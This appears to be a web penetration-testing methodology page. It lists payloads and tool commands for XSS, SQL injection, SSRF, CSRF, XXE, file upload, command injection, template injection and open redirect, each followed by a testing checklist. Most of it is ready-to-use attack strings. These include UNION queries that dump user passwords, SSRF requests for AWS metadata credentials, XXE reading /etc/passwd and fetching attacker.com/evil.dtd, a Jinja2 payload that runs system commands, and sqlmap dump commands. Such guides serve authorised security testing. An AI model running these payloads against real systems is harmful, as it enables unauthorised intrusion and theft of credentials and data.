Comprehensive testing methodologies for common and critical web vulnerabilities.
This section covers detailed testing approaches for identifying, exploiting, and reporting security vulnerabilities in web applications.
- Cross-Site Scripting (XSS)
- SQL Injection
- Server-Side Request Forgery (SSRF)
- Cross-Site Request Forgery (CSRF)
- Authentication Bypass
- Authorization & IDOR
- File Upload Vulnerabilities
- XXE (XML External Entity)
- Remote Code Execution (RCE)
- Business Logic Flaws
- Open Redirect
- Security Misconfiguration
- Reflected XSS - Payload in request, reflected in response
- Stored XSS - Payload stored in database, executed on retrieval
- DOM-based XSS - Payload executed through DOM manipulation
Basic XSS payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<body onload=alert(1)>Bypass techniques
<scr<script>ipt>alert(1)</script>
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="alert(1)">
<svg><script>alert(1)</script>Context-specific payloads
<!-- Inside HTML tag -->
"><script>alert(1)</script>
<!-- Inside attribute -->
" onmouseover="alert(1)
<!-- Inside JavaScript -->
';alert(1);//
<!-- Inside event handler -->
'-alert(1)-'Testing checklist
- Test all input fields (search, comments, profile fields)
- Test URL parameters
- Test HTTP headers (User-Agent, Referer, X-Forwarded-For)
- Test file upload filename
- Check for Content-Security-Policy bypasses
- Test with different encodings (HTML, URL, Unicode)
Tools
# XSStrike
python3 xsstrike.py -u "https://target.com?param=test"
# Dalfox
dalfox url https://target.com?param=test
# Nuclei XSS templates
nuclei -u https://target.com -t nuclei-templates/vulnerabilities/xss/Error-based detection
' OR '1'='1
" OR "1"="1
' OR 1=1--
admin'--
' UNION SELECT NULL--Blind SQLi detection
' AND SLEEP(5)--
' AND BENCHMARK(5000000,MD5('A'))--
' AND IF(1=1,SLEEP(5),0)--Union-based injection
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--Boolean-based blind
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a
' AND LENGTH(database())=5--Time-based blind
' AND IF(1=1,SLEEP(5),0)--
' OR IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--Database enumeration
-- MySQL
' UNION SELECT schema_name FROM information_schema.schemata--
-- PostgreSQL
' UNION SELECT datname FROM pg_database--
-- MSSQL
' UNION SELECT name FROM master..sysdatabases--
-- Oracle
' UNION SELECT table_name FROM all_tables--Testing checklist
- Test all parameters (GET, POST, headers, cookies)
- Test with different quote types (', ", `)
- Check error messages for database information
- Test ORDER BY to determine column count
- Test with SQL comments (--, #, /**/)
- Try different database functions
- Check for WAF and attempt bypasses
Tools
# SQLMap
sqlmap -u "https://target.com?id=1" --batch --dbs
sqlmap -u "https://target.com?id=1" -D database -T users --dump
# Manual testing with curl
curl "https://target.com?id=1' OR '1'='1"Common vulnerable parameters
- url=, uri=, path=, dest=, redirect=, image=, file=, callback=
Basic SSRF payloads
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://[::1]
http://2130706433 (decimal IP)
http://0x7f000001 (hex IP)
AWS metadata access
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/Bypass techniques
# URL encoding
http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31
# Alternative IP formats
http://0.0.0.0
http://0177.0.0.1 (octal)
http://2130706433 (decimal)
# DNS rebinding
http://spoofed.burpcollaborator.net
# Open redirect bypass
http://allowed-domain.com/redirect?url=http://169.254.169.254
Testing checklist
- Test with localhost variations
- Test cloud metadata endpoints
- Try internal IP ranges (10.x, 172.x, 192.168.x)
- Test different protocols (file://, gopher://, dict://)
- Check for URL parser inconsistencies
- Test with Burp Collaborator
- Attempt bypass with redirects
Tools
# SSRFmap
python3 ssrfmap.py -r request.txt -p url
# Manual testing
curl -X POST https://target.com/fetch -d "url=http://169.254.169.254/latest/meta-data/"Identification
- Missing CSRF tokens
- Predictable CSRF tokens
- CSRF tokens not validated
- Token validation only on POST
Basic CSRF PoC
<html>
<body>
<form action="https://target.com/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com" />
<input type="submit" value="Submit" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>CSRF with GET request
<img src="https://target.com/delete-account?confirm=yes">CSRF with AJAX
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://target.com/api/transfer", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(JSON.stringify({amount:1000, to:"attacker"}));
</script>Testing checklist
- Check if state-changing actions require CSRF tokens
- Test removing CSRF token
- Test with different user's token
- Test with same token length but different value
- Check if token is validated on GET requests only
- Test with empty token value
- Check for token leakage in referrer
SQL-based bypass
admin' OR '1'='1
admin'--
' OR 1=1--Logic bypass
username=admin&password=anything&login=true
username=admin&bypass=true
username[]=admin&password[]=pass
OTP/2FA bypass
- Try direct access to post-auth pages
- Check if OTP validation can be skipped
- Test OTP brute-forcing (rate limit bypass)
- Test response manipulation
- Check for OTP reuse
JWT vulnerabilities
- Algorithm confusion (RS256 to HS256)
- None algorithm
- Weak signing key
- JWT secret brute-forcing
- Missing expiration validation
Password reset flaws
- Parameter pollution (email=victim&email=attacker)
- Host header injection
- Token leakage in referrer
- Predictable tokens
- Token reuse
Testing checklist
- Test with SQLi payloads
- Try default credentials
- Test username enumeration
- Check for rate limiting on login
- Test password reset functionality
- Check JWT implementation
- Test OAuth flows
- Test 2FA implementation
- Check session management
Common IDOR locations
/api/user/123
/profile?id=456
/document/download/789
/order/details?order_id=1001
Testing methodology
1. Create two accounts (User A and User B)
2. Perform actions as User A
3. Capture requests with object references
4. Replay requests with User B's session
5. Check if access is granted to User A's resources
Parameter manipulation
# Numeric IDs
id=123 → id=124, id=122
user_id=1000 → user_id=1, user_id=admin
# GUIDs
Try sequential or predictable patterns
# Encoded values
Decode base64/hex and modify
# Array manipulation
id=123 → id[]=123&id[]=456
Horizontal vs Vertical privilege escalation
- Horizontal: Access other users' data at same privilege level
- Vertical: Access higher privilege functionality
Testing checklist
- Test all API endpoints with different user IDs
- Try accessing admin panels with low-priv user
- Test CRUD operations (Create, Read, Update, Delete)
- Check for missing function-level access control
- Test with missing, modified, or extra parameters
- Test wildcard or * as ID value
- Check for leaked object references in responses
Bypass techniques
Extension bypass
file.php
file.php.jpg
file.php%00.jpg (null byte)
file.php%0a.jpg
file.php.....
file.php/
file.php.
file.pHp
Content-Type bypass
Change: Content-Type: application/x-php
To: Content-Type: image/jpeg
Magic bytes manipulation
Add GIF89a header to PHP file
Add JPEG header (FF D8 FF) to PHP file
Path traversal in upload
filename="../../../shell.php"
filename="..%2f..%2fshell.php"
Testing checklist
- Test with executable extensions (.php, .jsp, .asp)
- Try double extensions
- Test with null byte injection
- Manipulate Content-Type header
- Add magic bytes to bypass file type checks
- Test path traversal in filename
- Try ZIP/archive upload with malicious files
- Test race conditions in upload+delete
- Check for arbitrary file overwrite
Tools
# Upload scanner
python3 upload-scanner.py -u https://target.com/upload
# Fuxploider
python3 fuxploider.py -u https://target.com/upload -t phpSimple XXE
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<root>&test;</root>XXE with parameter entity
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&send;</root>Blind XXE (out-of-band)
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>
<root></root>XXE via SVG upload
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="500" height="500">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>Testing checklist
- Test all XML input points
- Test with external entity references
- Try different file paths (/etc/passwd, C:\windows\win.ini)
- Test SSRF via XXE
- Test with SVG file uploads
- Check for blind XXE with out-of-band techniques
- Test with different encodings
Basic payloads
; ls
| ls
& ls
&& ls
%0Als
`ls`
$(ls)Bypass techniques
# Space bypass
{ls,-la}
$IFS
${IFS}
%09
# Keyword bypass
c''at /etc/passwd
c\at /etc/passwd
/???/??t /???/??ss??Detection
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Jinja2 (Python)
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}Testing checklist
- Test all input fields with template syntax
- Try command injection in system calls
- Test deserialization vulnerabilities
- Check for code evaluation functions
- Test with polyglot payloads
- Look for server logs with error messages
Price manipulation
amount=-100
quantity=-1
price=0
Race conditions
Send multiple requests simultaneously to:
- Redeem coupon multiple times
- Withdraw from account with insufficient funds
- Bypass rate limits
Parameter tampering
Change: role=user to role=admin
Change: isPremium=false to isPremium=true
Change: discount=10 to discount=100
Workflow bypass
Skip steps in multi-step processes
Access step 3 directly without completing steps 1 and 2
Testing checklist
- Test negative values
- Test very large numbers
- Skip workflow steps
- Replay old requests
- Test concurrent requests
- Manipulate prices and quantities
- Test referral/coupon abuse
- Check for time-based flaws
Common parameters
url=, redirect=, next=, return=, dest=, continue=, redir=
Basic payloads
?redirect=https://evil.com
?redirect=//evil.com
?redirect=/\/evil.com
?redirect=https://target.com@evil.com
?redirect=https://evil.com%00.target.com
Bypass techniques
# URL encoding
https%3A%2F%2Fevil.com
# Protocol-relative
//evil.com
# Whitelist bypass
https://evil.com?target.com
https://evil.com#target.com
https://target.com.evil.com
CORS misconfiguration
Origin: https://evil.com
Check if Access-Control-Allow-Origin reflects arbitrary origins
Missing security headers
X-Frame-Options
Content-Security-Policy
Strict-Transport-Security
X-Content-Type-Options
Directory listing
/backup/
/uploads/
/.git/
/admin/
Exposed sensitive files
/.git/config
/.env
/config.php
/web.config
/phpinfo.php
/.aws/credentials
Next Steps: Check Payloads for ready-to-use exploit strings.